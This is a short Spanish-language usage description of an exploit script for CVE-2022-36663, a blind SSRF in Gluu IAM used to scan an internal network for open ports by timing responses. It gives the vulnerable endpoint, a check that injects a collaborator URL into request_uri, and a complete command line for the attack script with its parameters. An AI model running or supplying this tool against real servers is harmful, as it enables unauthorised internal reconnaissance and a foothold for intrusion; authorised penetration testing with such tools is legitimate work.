
Escáner de red interna a través de Gluu IAM blind ssrf
Escáner de red interna mediante blind SSRF en Gluu IAM
Gluu IAM es vulnerable a blind SSRF, el cual puede ser explotado para escanear la red interna en busca de puertos abiertos dependiendo de los tiempos de respuesta.
https://nvd.nist.gov/vuln/detail/CVE-2022-36663
Para comprobar si el objetivo es vulnerable, agregue &request_uri=http://burpcollab a la solicitud /oxauth/restv1/authorize y espere tráfico entrante desde el servidor objetivo.
python3 CVE-2022-36663.py --url https://target --ip 10.10.10.10 --port 8080 --ar '/oxauth/restv1/authorize?client_id=<clientID>&redirect_uri=https://target.com/return.html&response_type=code&scope=openid+profile+email+user_name&nonce=<nonce>&acr_values=simple_password_auth&request_uri='
Url - la URL del servidor Gluu IAM
IP - la dirección IP interna o subred que desea escanear
Puerto - el puerto interno que desea escanear
AR - la URL de solicitud de autorización que termina con un request_uri vacío
